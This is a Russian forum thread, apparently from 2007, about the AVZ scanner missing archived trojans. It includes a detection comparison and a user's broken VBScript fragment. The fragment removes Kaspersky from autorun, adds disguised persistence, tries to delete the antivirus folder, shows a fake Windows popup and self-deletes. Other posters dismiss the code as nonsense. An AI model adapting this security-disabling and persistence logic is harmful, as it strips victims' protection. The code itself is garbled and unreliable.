avz - не нашло шесть вирусов

[Серёга ламошник]

Просто решил для экспиремента скачать с интернета 6 вирусов в архивах, касперский их сразу обнаружил, но я решил посмотреть что скажет avz - молчит, хотя я поставил проверку архивов. Вот собственно говоря сами вирусы:
1. троянская программа Backdoor.Win32.Delf.aty
2. троянская программа Backdoor.Win32.Delf.aty
3. троянская программа Trojan-Downloader.Win32.Delf.bkf
4. троянская программа Trojan-Downloader.Win32.Delf.bkf
5. троянская программа Backdoor.Win32.Delf.aty
6. троянская программа Trojan-PSW.Win32.LdPinch.bdh
7. моя собственная работа - удаляет касперского из автозагрузки
конечно они повторяются (по названиям, просто там есть server.exe, client.exe и тд) - но факт - есть факт.
обновлялся я перед проверкой - может стоит внести их в базу или зачем тогда ставить проверку архивов

[Макcим]

Отправьте Олегу сами файлы http://z-oleg.com/secur/avz/uploadvir.php и ссылку на источник http://z-oleg.com/secur/avz/uploadu.php

[drongo]

насчёт 7 вируса, каспер довольно жёстко защищает свои ключики - без окна проактивки тут не обойтись- или всё-таки нашёл обход проактивки ?

[ВодкуГлыть]

Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.

[Muffler]

avz - не нашло шесть вирусов

Всех детектить невозможно...

Вот результаты моего последнего теста:

Код:

Sunday, September 2, 2007
Total 216 files to scan.
=====================
KAV
Scaned: 313
Detected: 210
=====================
AVZ
Scaned: 232
Detected: 102
Suspicious: 19
=====================
DrWeb CureIt Beta
Scaned: 215
Detected: 174
=====================
Avira Antivir
Scaned: 228
Detected: 182
=====================

Добавлено через 7 минут

1. троянская программа Backdoor.Win32.Delf.aty
2. троянская программа Backdoor.Win32.Delf.aty
3. троянская программа Trojan-Downloader.Win32.Delf.bkf
4. троянская программа Trojan-Downloader.Win32.Delf.bkf
5. троянская программа Backdoor.Win32.Delf.aty
6. троянская программа Trojan-PSW.Win32.LdPinch.bdh

Три зловреда...

Плюс ->

7. моя собственная работа

- удаляет касперского из автозагрузки

...неповерю пока неувижу...

[Серёга ламошник]

я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
вот некотарая часть одного из скриптов
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set fso = CreateObject("Wscript.Shell")
on error resume next
fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
dim usb
Set fso = CreateObject("Scripting.FileSystemObject")
Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
fso.DeleteFolder "c:\program files\Kaspersky Lab"")
usb.Close
fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
FileSystemObject.deletefile WScript.ScriptFullName, True
может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!

[DVi]

Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.

В приведенном скрипте VBS делаются какие-то невзаимосвязанные действия. Иными словами, написана полная чушь.
И уж однозначно такая строчка пресекается самозащитой KAV:

fso.DeleteFolder "c:\program files\Kaspersky Lab"

Подозреваю, что под именем "Серёга ламошник" к нам пожаловал знаменитый своей безграмотностью Nodik/Vitalik/леночка с фан-клуба ЛК

[drongo]

Серёга ламошник ,выложите работоспособную программу убивающую каспера по этой ссылке : http://virusinfo.info/upload_virus.php?tid=12831 в zip архиве с паролем virus
а пока это просто не серьёзно

[Серёга ламошник]

щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!
А то, что скрипт не правельный и не последовательный я и без вас знаю - там написано что это часть скрипта - так сказать склейка со всякой ерундой, выложи я правельный скрипт( и полный) его бы сразу ламеры бы откопировали и начали бомбить бедных "пользователей" ПК, а меня потом бы совесть мучала - этот вирус я касперскому отправлю - пусть подумает над его простотой - не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.
я его вообще удалю от греха подальше - и забудьте что я написал - можете считать что я нагло наврал вам - я "peace-door-bol"

[SuperBrat]

Ситуация как в Северной Корее, что-то же они взорвали, но "гриб" никто не видел.

[ALEX(XX)]

щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!

Тише, тише...

[ВодкуГлыть]

я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
вот некотарая часть одного из скриптов
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set fso = CreateObject("Wscript.Shell")
on error resume next
fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
dim usb
Set fso = CreateObject("Scripting.FileSystemObject")
Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
fso.DeleteFolder "c:\program files\Kaspersky Lab"")
usb.Close
fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
FileSystemObject.deletefile WScript.ScriptFullName, True
может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!

Теперь вижу, что чушь. ИМХО, у Вас паранойя.

[Surfer]

lol

[vvv]

там написано что это часть скрипта

Ну да написано.

так сказать склейка со всякой ерундой

А вот этого не написано, хотя сииильно заметно!! И непонятно,зачем тогда вообще сюда это кидать?

а меня потом бы совесть мучала

А сейчас совесть не мучает, что отрываете других пользователей от более праведных дел?

И в любом случае!! Если заявился, то действуй до конца.

И напоследок

не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.

По моему это определение подходит под ламер. Иэ этого следует вопрос на засыпку...
Серёга ламошник А вы случаем с помощью avz проверяли не после того как касперский удалил вирусы?! По крайне мере из Вашего первого поста такую логическую цепочку можно спрогнозировать.

[Серёга ламошник]

вообщето вирусы были в архивах(я уже об это говорил) и касперский их не мог оттуда удалить!!!!!!!! потомучто при каждой проверке архива касперский визжал и придлогал их удалить, не зависимо от выбора - удалить - пропустить - вирусы оставались в компьютере - а скрипт для ло..ов написан - просто чисто поржать над вами - всем спасибо - все свободны

[vvv]

Серёга ламошник
Далеко однако ты пойдешь с таким отношением.

[ALEX(XX)]

все свободны

Уговорил, свободен